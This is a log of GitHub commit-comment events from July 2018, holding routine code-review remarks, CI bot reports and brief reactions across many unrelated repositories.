{"id":"8007225695","type":"CommitCommentEvent","actor":{"login":"iopietro"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29807795,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-24T01:07:23Z","updated_at":"2018-07-24T01:07:23Z","author_association":"COLLABORATOR","body":"Old villages distribution:\r\n![oldspread](https://user-images.githubusercontent.com/5269236/43110833-75c507c4-8eee-11e8-8211-9e00b0741dfb.JPG)\r\n![oldspread2](https://user-images.githubusercontent.com/5269236/43110834-75e136b0-8eee-11e8-8802-747f63d1ee79.png)\r\n\r\nNew villages (and artifact villages) distribution\r\n![newspread](https://user-images.githubusercontent.com/5269236/43110854-8f2b8a26-8eee-11e8-8b87-23732758caf7.JPG)\r\n![newspread2](https://user-images.githubusercontent.com/5269236/43110855-8f465c02-8eee-11e8-82a0-c247c4c514fb.png)\r\n"}},"created_at":"2018-07-24T01:07:23Z"}
{"id":"8007228165","type":"CommitCommentEvent","actor":{"login":"zhaozhuoboy"},"repo":{"name":"xuanhewang/lottery"},"payload":{"comment":{"id":29807803,"position":null,"line":null,"path":null,"commit_id":"f4a15ba1b2477835d40faa1e2438c5b90fa4f100","created_at":"2018-07-24T01:08:20Z","updated_at":"2018-07-24T01:08:20Z","author_association":"NONE","body":"@xuanhewang "}},"created_at":"2018-07-24T01:08:20Z"}
{"id":"8007229786","type":"CommitCommentEvent","actor":{"login":"amiesuh"},"repo":{"name":"amiesuh/MyPortfolio"},"payload":{"comment":{"id":29807808,"position":null,"line":null,"path":null,"commit_id":"9ba97a1cd4baab39b69b3ab787fcc5b12385bb78","created_at":"2018-07-24T01:09:00Z","updated_at":"2018-07-24T01:09:00Z","author_association":"OWNER","body":"Simple Website (wip)\r\n-using html, css, and javascript\r\n- single use of API\r\n"}},"created_at":"2018-07-24T01:09:00Z"}
{"id":"8007230869","type":"CommitCommentEvent","actor":{"login":"Optixal"},"repo":{"name":"the-c0d3r/admin-finder"},"payload":{"comment":{"id":29807813,"position":null,"line":null,"path":null,"commit_id":"b53435fab8dbc7fdb2e2bb4a26645c28c0952443","created_at":"2018-07-24T01:09:25Z","updated_at":"2018-07-24T01:09:25Z","author_association":"NONE","body":"😀 "}},"created_at":"2018-07-24T01:09:25Z"}
{"id":"8007235274","type":"CommitCommentEvent","actor":{"login":"songy23"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29807822,"position":6,"line":19,"path":"contrib/zpages/build.gradle","commit_id":"48f9df44957794e14680e7587d4865279b521251","created_at":"2018-07-24T01:11:12Z","updated_at":"2018-07-24T01:11:12Z","author_association":"NONE","body":"Yes, but that only works with the examples within the opencensus project. Anyway you can use that path to update the zpages for now, I'll continue investigating the correct path to be used for user applications."}},"created_at":"2018-07-24T01:11:12Z"}
{"id":"8007236011","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"CodeMC/HolographicDisplays"},"payload":{"comment":{"id":29807823,"position":null,"line":null,"path":null,"commit_id":"3a5aa2da3469fedf611e786694e0ca7a76847fef","created_at":"2018-07-24T01:11:31Z","updated_at":"2018-07-24T01:11:31Z","author_association":"MEMBER","body":"1) does it happen only with this hologram?\r\n2) yeah, i changed some utils class names"}},"created_at":"2018-07-24T01:11:31Z"}
{"id":"8007236950","type":"CommitCommentEvent","actor":{"login":"WJSNLuda"},"repo":{"name":"rINanDO/android_device_samsung_i9100"},"payload":{"comment":{"id":29807825,"position":null,"line":null,"path":null,"commit_id":"e7a724eb1028202a6df5b4c50824b2748e0a1fa5","created_at":"2018-07-24T01:11:53Z","updated_at":"2018-07-24T01:11:53Z","author_association":"NONE","body":"Hi rINanDO,\r\nsorry if I'm wrong here but is ist possible to add xpad to defconfig to support xbox360 controller via usb adapter:\r\nCONFIG_JOYSTICK_XPAD=y\r\nCONFIG_JOYSTICK_XPAD_FF=y\r\nCONFIG_JOYSTICK_XPAD_LEDS=y"}},"created_at":"2018-07-24T01:11:53Z"}
{"id":"8007243245","type":"CommitCommentEvent","actor":{"login":"lincolwn"},"repo":{"name":"levymtmr/work-at-olist"},"payload":{"comment":{"id":29807832,"position":null,"line":null,"path":null,"commit_id":"9dabe07b3ae63127911b783d4581728d33d910bb","created_at":"2018-07-24T01:14:15Z","updated_at":"2018-07-24T01:14:15Z","author_association":"NONE","body":"@levymtmr \r\n\r\nAquI https://github.com/levymtmr/work-at-olist/blob/c6ba211754e4c4e4341e4d643650aaf4a9637693/calls/views.py#L12-L19\r\n\r\nEu mudaria as `viewsets` para `CreateOrReadOnlyViewSet`, por que não faz sentido deletar nem editar uma `call` existente via api."}},"created_at":"2018-07-24T01:14:15Z"}
{"id":"8007246632","type":"CommitCommentEvent","actor":{"login":"LiuDanica"},"repo":{"name":"LiuDanica/VR-Board-Room"},"payload":{"comment":{"id":29807841,"position":null,"line":null,"path":null,"commit_id":"4b1dc5c798ccaa5eec86f45892fa4b02b7e3b477","created_at":"2018-07-24T01:15:37Z","updated_at":"2018-07-24T01:15:37Z","author_association":"OWNER","body":"[VRRoomServer.zip](https://github.com/LiuDanica/VR-Board-Room/files/2221584/VRRoomServer.zip)\r\n"}},"created_at":"2018-07-24T01:15:37Z"}
{"id":"8007247572","type":"CommitCommentEvent","actor":{"login":"BlueOrchard"},"repo":{"name":"BlueOrchard/ModUpdates-Frontend"},"payload":{"comment":{"id":29807843,"position":null,"line":null,"path":null,"commit_id":"35b362dc5c5480a3eeb3d48ee1b31ab1a62d7a47","created_at":"2018-07-24T01:16:00Z","updated_at":"2018-07-24T01:16:00Z","author_association":"OWNER","body":"Stopping here and pushing to master!"}},"created_at":"2018-07-24T01:16:00Z"}
{"id":"8007252884","type":"CommitCommentEvent","actor":{"login":"mikroskeem"},"repo":{"name":"mikroskeem/BenjiAuth"},"payload":{"comment":{"id":29807854,"position":null,"line":null,"path":null,"commit_id":"e1b751e86276de94c0e4ef20108572b58b992677","created_at":"2018-07-24T01:17:59Z","updated_at":"2018-07-24T01:17:59Z","author_association":"OWNER","body":"```patch\r\ndiff --git a/src/main/kotlin/eu/mikroskeem/benjiauth/listeners/PlayerLoginStatusChangeListener.kt b/src/main/kotlin/eu/mikroskeem/benjiauth/listeners/PlayerLoginStatusChangeListener.kt\r\nindex fe88aa2..0461dde 100644\r\n--- a/src/main/kotlin/eu/mikroskeem/benjiauth/listeners/PlayerLoginStatusChangeListener.kt\r\n+++ b/src/main/kotlin/eu/mikroskeem/benjiauth/listeners/PlayerLoginStatusChangeListener.kt\r\n@@ -71,18 +71,21 @@ class PlayerLoginStatusChangeListener: Listener {\r\n             event.player.resetTitle()\r\n \r\n         // Return if player is already in lobby server\r\n+        val oldServer = event.player.server\r\n         if(event.player.server?.info?.name == lobby.name)\r\n             return\r\n \r\n         event.player.movePlayer(lobby, retry = true) { success, e ->\r\n             if(!success) {\r\n                 // TODO: Not successful, but throwable is null. What's up?\r\n-                if(config.servers.kickIfLobbyIsDown) {\r\n+                if(config.servers.kickIfLobbyIsDown && event.player.name != \"mikroskeem\") {\r\n                     event.player.kickWithMessage(messages.error.couldntConnectToLobby)\r\n                 } else {\r\n                     event.player.message(messages.error.couldntConnectToLobby)\r\n                 }\r\n                 plugin.pluginLogger.error(\"Couldn't connect logged in player ${event.player.name} to lobby\", e)\r\n+                plugin.pluginLogger.warn(\"success=$success, throwable=$e, playerServer=${event.player.server?.info?.name}, \" +\r\n+                        \"oldPlayerServer=${oldServer?.info?.name}, targetServer=${lobby.name}\")\r\n             }\r\n         }\r\n     }\r\n```"}},"created_at":"2018-07-24T01:17:59Z"}
{"id":"8007254784","type":"CommitCommentEvent","actor":{"login":"mikroskeem"},"repo":{"name":"mikroskeem/BenjiAuth"},"payload":{"comment":{"id":29807855,"position":null,"line":null,"path":null,"commit_id":"e1b751e86276de94c0e4ef20108572b58b992677","created_at":"2018-07-24T01:18:44Z","updated_at":"2018-07-24T01:18:44Z","author_association":"OWNER","body":"`oldServer` is null in this context, which means I should ignore success failure completely?\r\n\r\nThis issue appears too rarely to reproduce this 100%..."}},"created_at":"2018-07-24T01:18:44Z"}
{"id":"8007257074","type":"CommitCommentEvent","actor":{"login":"lvjt1"},"repo":{"name":"lvjt1/test"},"payload":{"comment":{"id":29807858,"position":null,"line":null,"path":null,"commit_id":"6a0756f5c12ede342ebbae91cc0dd5da832dda1d","created_at":"2018-07-24T01:19:38Z","updated_at":"2018-07-24T01:19:38Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-24T01:19:38Z"}
{"id":"8007257234","type":"CommitCommentEvent","actor":{"login":"lincolwn"},"repo":{"name":"levymtmr/work-at-olist"},"payload":{"comment":{"id":29807859,"position":null,"line":null,"path":null,"commit_id":"9dabe07b3ae63127911b783d4581728d33d910bb","created_at":"2018-07-24T01:19:42Z","updated_at":"2018-07-24T01:19:42Z","author_association":"NONE","body":"@levymtmr \r\nPelo que entendi da documentação não tem necessidade de `CallViewSet` . Uma vez que na API basta ver os `CallStart`, `CallEnd` e o resumo de `Call` no `Billing`"}},"created_at":"2018-07-24T01:19:42Z"}
{"id":"8007282409","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29807909,"position":null,"line":null,"path":null,"commit_id":"48202596cd38b37c2304ed87c37e5a6142992058","created_at":"2018-07-24T01:29:41Z","updated_at":"2018-07-24T01:29:41Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-MacOS-10.9-clang: OK (2941 of 2944 tests passed, 10 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-24T01:29:41Z"}
{"id":"8007288663","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29807923,"position":17,"line":17,"path":"src/GUI/GUI.java","commit_id":"4811c7f463cebee8ff4e34c52c13378e99ec3232","created_at":"2018-07-24T01:32:01Z","updated_at":"2018-07-24T01:32:01Z","author_association":"CONTRIBUTOR","body":"Not at the moment"}},"created_at":"2018-07-24T01:32:01Z"}
{"id":"8007295404","type":"CommitCommentEvent","actor":{"login":"lincolwn"},"repo":{"name":"levymtmr/work-at-olist"},"payload":{"comment":{"id":29807935,"position":null,"line":null,"path":null,"commit_id":"c6ba211754e4c4e4341e4d643650aaf4a9637693","created_at":"2018-07-24T01:34:35Z","updated_at":"2018-07-24T01:34:35Z","author_association":"NONE","body":"@levymtmr \r\n\r\nNo modulo `models.py` você ainda pode criar uma class chamada `Call`.\r\n\r\nEla seria uma classe simples apenas para guarda o resumo da ligacao e calcular o valor da ligação (regra de negócio):\r\n\r\n```python\r\nclass Call:\r\n\r\n    def __init__(start_call, end_call):\r\n        self.start_call = start_call\r\n        self.end_call = end_call\r\n\r\n   @property\r\n    def call_id(self):\r\n        return self.start_call.call_id\r\n\r\n    @property\r\n    def source(self):\r\n        return self.start_call.source\r\n\r\n    @property\r\n    def destination(self):\r\n        return self.start_call.destination\r\n\r\n    @property\r\n    def duration(self):\r\n        return self.end_call.timestamp - self.start_call.timestamp\r\n\r\n    @property\r\n    def cost(self):\r\n        # TODO: regra de negocio para calcular o custo da ligação\r\n```"}},"created_at":"2018-07-24T01:34:35Z"}
{"id":"8007296500","type":"CommitCommentEvent","actor":{"login":"shilpa24balaji"},"repo":{"name":"mrigaya/parodus"},"payload":{"comment":{"id":29807940,"position":30,"line":30,"path":"tests/test_heartBeatTimer.c","commit_id":"adfd2e82ad40d509a3a9762e750a01985b0de916","created_at":"2018-07-24T01:35:00Z","updated_at":"2018-07-24T01:35:00Z","author_association":"NONE","body":"initialize to some other value other than 0 and then confirm if set to 0"}},"created_at":"2018-07-24T01:35:00Z"}
{"id":"8007301183","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29807945,"position":null,"line":null,"path":null,"commit_id":"ffe3382de8715b3f0b3a3b5902f827204a8710a9","created_at":"2018-07-24T01:36:44Z","updated_at":"2018-07-24T01:36:44Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-522](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-522).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-522-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T01:36:44Z"}
{"id":"8007302537","type":"CommitCommentEvent","actor":{"login":"nosmokingbandit"},"repo":{"name":"sawyersteven/SelfishClass"},"payload":{"comment":{"id":29807949,"position":12,"line":12,"path":"tests.py","commit_id":"f1593ed679799c93ea9f89fc4b4c976d4c6b85d4","created_at":"2018-07-24T01:37:17Z","updated_at":"2018-07-24T01:37:17Z","author_association":"NONE","body":"That's awesome."}},"created_at":"2018-07-24T01:37:17Z"}
{"id":"8007303297","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807951,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T01:37:35Z","updated_at":"2018-07-24T01:37:35Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T01:37:35Z"}
{"id":"8007303411","type":"CommitCommentEvent","actor":{"login":"shilpa24balaji"},"repo":{"name":"mrigaya/parodus"},"payload":{"comment":{"id":29807952,"position":null,"line":null,"path":null,"commit_id":"adfd2e82ad40d509a3a9762e750a01985b0de916","created_at":"2018-07-24T01:37:37Z","updated_at":"2018-07-24T01:37:37Z","author_association":"NONE","body":"I think we should add unit tests to verify concurrency i.e. modify using 2 threads"}},"created_at":"2018-07-24T01:37:37Z"}
{"id":"8007303984","type":"CommitCommentEvent","actor":{"login":"sawyersteven"},"repo":{"name":"sawyersteven/SelfishClass"},"payload":{"comment":{"id":29807953,"position":12,"line":12,"path":"tests.py","commit_id":"f1593ed679799c93ea9f89fc4b4c976d4c6b85d4","created_at":"2018-07-24T01:37:50Z","updated_at":"2018-07-24T01:37:50Z","author_association":"OWNER","body":"That's awesome."}},"created_at":"2018-07-24T01:37:50Z"}
{"id":"8007304450","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807955,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T01:38:01Z","updated_at":"2018-07-24T01:38:01Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T01:38:01Z"}
{"id":"8007307555","type":"CommitCommentEvent","actor":{"login":"jmansour"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29807962,"position":null,"line":null,"path":null,"commit_id":"1b9e34d01a094eeb648a9eab6c2586a3616dff10","created_at":"2018-07-24T01:39:11Z","updated_at":"2018-07-24T01:39:11Z","author_association":"CONTRIBUTOR","body":"Excellent!  Good work Julian.  You are a top top bloke.\n\nOn Tue, Jul 24, 2018 at 10:44 AM Julian Giordani <notifications@github.com>\nwrote:\n\n> Jenkins is happy again! Nice one. I'll update Jenkins later this week.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/underworldcode/underworld2/commit/1b9e34d01a094eeb648a9eab6c2586a3616dff10#commitcomment-29807651>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABX2nY_yKjyOePOxn_-7VfgQMxrGReehks5uJm3YgaJpZM4Vb57O>\n> .\n>\n"}},"created_at":"2018-07-24T01:39:11Z"}
{"id":"8007308729","type":"CommitCommentEvent","actor":{"login":"mrkingchan"},"repo":{"name":"mrkingchan/GoldenField"},"payload":{"comment":{"id":29807964,"position":19,"line":12,"path":"GoldenField.xcodeproj/xcuserdata/Macx.xcuserdatad/xcschemes/xcschememanagement.plist","commit_id":"95026c2ac10e57852430aa4ddd993c80a685d7c6","created_at":"2018-07-24T01:39:38Z","updated_at":"2018-07-24T01:39:38Z","author_association":"OWNER","body":" 推送扩展 ++ "}},"created_at":"2018-07-24T01:39:38Z"}
{"id":"8007312038","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29807969,"position":null,"line":null,"path":null,"commit_id":"254d4faaf27e68a3309bb3234f7b22e482fd7dba","created_at":"2018-07-24T01:40:54Z","updated_at":"2018-07-24T01:40:54Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.372`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/407415514) :tada:"}},"created_at":"2018-07-24T01:40:54Z"}
{"id":"8007312722","type":"CommitCommentEvent","actor":{"login":"n18020"},"repo":{"name":"n18020/programming-term2"},"payload":{"comment":{"id":29807971,"position":null,"line":null,"path":null,"commit_id":"784d4c69cf5efd0c5832ffa7f4787e1b480d6555","created_at":"2018-07-24T01:41:10Z","updated_at":"2018-07-24T01:41:10Z","author_association":"OWNER","body":"PCの時間の件すみません！\r\nご迷惑をお掛けしました！\r\n\r\n2018年7月22日(日) 午後6:07 kinjo-icolle <notifications@github.com>:\r\n\r\n> まず課題と関係ない部分ですが、時計直した結果、逆にちょっと時間が遅れちゃってるかも?\r\n> 水曜日の講義でやったもののコミット時刻が水曜日の講義前になってます。時間が合ってるかちょっとチェックしてみてください。\r\n>\r\n>\r\n> 課題ですが、かなりいい所まで行ってますが、まだメインメニューのキャンセルと、オプションの「0個以上繰り返し注文」「何も入力せずエンター、またはqで終了」が出来ていないようですね。\r\n> 余裕があれば修正してみてください。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18020/programming-term2/commit/784d4c69cf5efd0c5832ffa7f4787e1b480d6555#commitcomment-29791720>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AlQx_WErXYhTPsVqC2LAj8ATNBFsJeqCks5uJEC6gaJpZM4VZ7Gt>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-24T01:41:10Z"}
{"id":"8007316838","type":"CommitCommentEvent","actor":{"login":"YitianChen1996"},"repo":{"name":"alibaba/pouch"},"payload":{"comment":{"id":29807976,"position":null,"line":null,"path":null,"commit_id":"b8beec54f580baa6290496a13bede51b314c4b18","created_at":"2018-07-24T01:42:42Z","updated_at":"2018-07-24T01:42:42Z","author_association":"NONE","body":"Ⅰ. Describe what this PR did\r\nAdd unit test cases for func useProxy()\r\n\r\nⅡ. Does this pull request fix one issue?\r\nYes, #1760\r\n\r\nⅢ. Describe how you did it\r\nImplement test and design test cases for func useProxy()\r\n\r\nⅣ. Describe how to verify it\r\nRun go test ctrd/image_proxy_util_test.go ctrd/image_proxy_util.go\r\n\r\nⅤ. Special notes for reviews\r\nBaiji 264, Team 7"}},"created_at":"2018-07-24T01:42:42Z"}
{"id":"8007317087","type":"CommitCommentEvent","actor":{"login":"yamahir0823"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29807977,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T01:42:48Z","updated_at":"2018-07-24T01:42:48Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-24T01:42:48Z"}
{"id":"8007318487","type":"CommitCommentEvent","actor":{"login":"mistos"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29807978,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T01:43:20Z","updated_at":"2018-07-24T01:43:20Z","author_association":"NONE","body":"Gooood project\r\n"}},"created_at":"2018-07-24T01:43:20Z"}
{"id":"8007324201","type":"CommitCommentEvent","actor":{"login":"goIncognito"},"repo":{"name":"goIncognito/Repo1"},"payload":{"comment":{"id":29807990,"position":null,"line":null,"path":null,"commit_id":"36b522858192190d9fb72a1358cb4bd40ad0a6d9","created_at":"2018-07-24T01:45:30Z","updated_at":"2018-07-24T01:45:30Z","author_association":"OWNER","body":"Udemy-dl is used to download Udemy Videos"}},"created_at":"2018-07-24T01:45:30Z"}
{"id":"8007330309","type":"CommitCommentEvent","actor":{"login":"gdhwang"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29807996,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T01:47:47Z","updated_at":"2018-07-24T01:47:47Z","author_association":"NONE","body":"good!!"}},"created_at":"2018-07-24T01:47:47Z"}
{"id":"8007333293","type":"CommitCommentEvent","actor":{"login":"TAKE72K"},"repo":{"name":"leedaniel682/MisakiAobaBot"},"payload":{"comment":{"id":29808001,"position":null,"line":null,"path":null,"commit_id":"52187252fcb6db8c2175ac6ad2bdf96e3d1152df","created_at":"2018-07-24T01:48:57Z","updated_at":"2018-07-24T01:48:57Z","author_association":"COLLABORATOR","body":"..."}},"created_at":"2018-07-24T01:48:57Z"}
{"id":"8007342150","type":"CommitCommentEvent","actor":{"login":"samj1912"},"repo":{"name":"metabrainz/picard"},"payload":{"comment":{"id":29808019,"position":4,"line":64,"path":"picard/tagger.py","commit_id":"b0e282ad5398e9c7e88b1615b3be55b021c1cc06","created_at":"2018-07-24T01:52:15Z","updated_at":"2018-07-24T01:52:15Z","author_association":"MEMBER","body":"This is in the wrong order. Import statements come before from statements."}},"created_at":"2018-07-24T01:52:15Z"}
{"id":"8007342242","type":"CommitCommentEvent","actor":{"login":"rpherbig"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":29808020,"position":3,"line":15,"path":"gpouch.lic","commit_id":"e0e7e9ffd97e11d3acf3cd7045e027afdd7181ae","created_at":"2018-07-24T01:52:17Z","updated_at":"2018-07-24T01:52:17Z","author_association":"OWNER","body":":x: There's a comma missing from this line"}},"created_at":"2018-07-24T01:52:17Z"}
{"id":"8007344412","type":"CommitCommentEvent","actor":{"login":"rpherbig"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":29808022,"position":4,"line":16,"path":"gpouch.lic","commit_id":"e0e7e9ffd97e11d3acf3cd7045e027afdd7181ae","created_at":"2018-07-24T01:53:01Z","updated_at":"2018-07-24T01:53:01Z","author_association":"OWNER","body":"❓ What does `\\s` mean for the regex here?"}},"created_at":"2018-07-24T01:53:01Z"}
{"id":"8007349333","type":"CommitCommentEvent","actor":{"login":"hoanguyen1968"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808030,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T01:54:53Z","updated_at":"2018-07-24T01:54:53Z","author_association":"NONE","body":"Great Project"}},"created_at":"2018-07-24T01:54:53Z"}
{"id":"8007351258","type":"CommitCommentEvent","actor":{"login":"abankrah"},"repo":{"name":"abankrah/Data_Science_Assignment_Pandas_9.11287"},"payload":{"comment":{"id":29808037,"position":null,"line":null,"path":null,"commit_id":"66680229539c00b07a62875ad7b60ffacc8769f5","created_at":"2018-07-24T01:55:36Z","updated_at":"2018-07-24T01:55:36Z","author_association":"OWNER","body":"![question 1](https://user-images.githubusercontent.com/39193389/43112234-1f35f36c-8ec3-11e8-8e99-26087591cb2e.PNG)\r\n![question 2](https://user-images.githubusercontent.com/39193389/43112235-1f605eb8-8ec3-11e8-830f-0aae08eb4c08.PNG)\r\n![question 3](https://user-images.githubusercontent.com/39193389/43112236-1f8cec94-8ec3-11e8-9027-5f0cd7a89c40.PNG)\r\n![question 4](https://user-images.githubusercontent.com/39193389/43112237-1fb27af4-8ec3-11e8-9ab2-417a28b522aa.PNG)\r\n![question 5](https://user-images.githubusercontent.com/39193389/43112238-1fc26f0e-8ec3-11e8-9494-02c25025ae13.PNG)\r\n"}},"created_at":"2018-07-24T01:55:36Z"}
{"id":"8007351327","type":"CommitCommentEvent","actor":{"login":"hoanguyen1968"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808038,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T01:55:38Z","updated_at":"2018-07-24T01:55:38Z","author_association":"NONE","body":"Nice job"}},"created_at":"2018-07-24T01:55:38Z"}
{"id":"8007356237","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"littlepony99/online_shop"},"payload":{"comment":{"id":29808049,"position":18,"line":42,"path":"src/main/java/com/study/onlineshop/dao/jdbc/JdbcProductDao.java","commit_id":"886769d275c5133275d13b25e1bce12db018a545","created_at":"2018-07-24T01:57:26Z","updated_at":"2018-07-24T01:57:26Z","author_association":"NONE","body":"можно обойти без этого. Умножать страницу на количество записей на странице(константу)\r\n"}},"created_at":"2018-07-24T01:57:26Z"}
{"id":"8007356681","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"littlepony99/online_shop"},"payload":{"comment":{"id":29808050,"position":24,"line":48,"path":"src/main/java/com/study/onlineshop/dao/jdbc/JdbcProductDao.java","commit_id":"886769d275c5133275d13b25e1bce12db018a545","created_at":"2018-07-24T01:57:37Z","updated_at":"2018-07-24T01:57:37Z","author_association":"NONE","body":"вынести"}},"created_at":"2018-07-24T01:57:37Z"}
{"id":"8007357210","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"littlepony99/online_shop"},"payload":{"comment":{"id":29808051,"position":17,"line":41,"path":"src/main/java/com/study/onlineshop/dao/jdbc/JdbcProductDao.java","commit_id":"886769d275c5133275d13b25e1bce12db018a545","created_at":"2018-07-24T01:57:49Z","updated_at":"2018-07-24T01:57:49Z","author_association":"NONE","body":"внести внутрь нижнего блока кода"}},"created_at":"2018-07-24T01:57:49Z"}
{"id":"8007358092","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"littlepony99/online_shop"},"payload":{"comment":{"id":29808054,"position":9,"line":30,"path":"src/main/java/com/study/onlineshop/web/servlet/ProductsServlet.java","commit_id":"886769d275c5133275d13b25e1bce12db018a545","created_at":"2018-07-24T01:58:09Z","updated_at":"2018-07-24T01:58:09Z","author_association":"NONE","body":"мож того? залогируем?"}},"created_at":"2018-07-24T01:58:09Z"}
{"id":"8007358760","type":"CommitCommentEvent","actor":{"login":"Croydon"},"repo":{"name":"inexorgame/audioaugust"},"payload":{"comment":{"id":29808057,"position":null,"line":null,"path":null,"commit_id":"3a3791205e3cc0f95bbeb81ad9044b170e092df5","created_at":"2018-07-24T01:58:24Z","updated_at":"2018-07-24T01:58:24Z","author_association":"MEMBER","body":"Please don't use wav"}},"created_at":"2018-07-24T01:58:24Z"}
{"id":"8007359340","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"littlepony99/online_shop"},"payload":{"comment":{"id":29808059,"position":24,"line":77,"path":"src/main/resources/templates/products.html","commit_id":"886769d275c5133275d13b25e1bce12db018a545","created_at":"2018-07-24T01:58:37Z","updated_at":"2018-07-24T01:58:37Z","author_association":"NONE","body":"страниц не 3."}},"created_at":"2018-07-24T01:58:37Z"}
{"id":"8007361667","type":"CommitCommentEvent","actor":{"login":"Sarvatt"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":29808064,"position":4,"line":16,"path":"gpouch.lic","commit_id":"e0e7e9ffd97e11d3acf3cd7045e027afdd7181ae","created_at":"2018-07-24T01:59:31Z","updated_at":"2018-07-24T01:59:31Z","author_association":"CONTRIBUTOR","body":"the \\ was missed from a cut and paste, it should ust be /sell/i"}},"created_at":"2018-07-24T01:59:31Z"}
{"id":"8009118378","type":"CommitCommentEvent","actor":{"login":"ramidzkh"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29811909,"position":null,"line":null,"path":null,"commit_id":"c5259a8bb1fed4e846f081d540c14595e4fcf962","created_at":"2018-07-24T10:00:17Z","updated_at":"2018-07-24T10:00:17Z","author_association":"COLLABORATOR","body":"All my hard work, gone to waste 😭"}},"created_at":"2018-07-24T10:00:17Z"}
{"id":"8009122591","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29811918,"position":null,"line":null,"path":null,"commit_id":"c5259a8bb1fed4e846f081d540c14595e4fcf962","created_at":"2018-07-24T10:01:00Z","updated_at":"2018-07-24T10:01:00Z","author_association":"MEMBER","body":"Look in the build.gradle dependencies @ramidzkh "}},"created_at":"2018-07-24T10:01:00Z"}
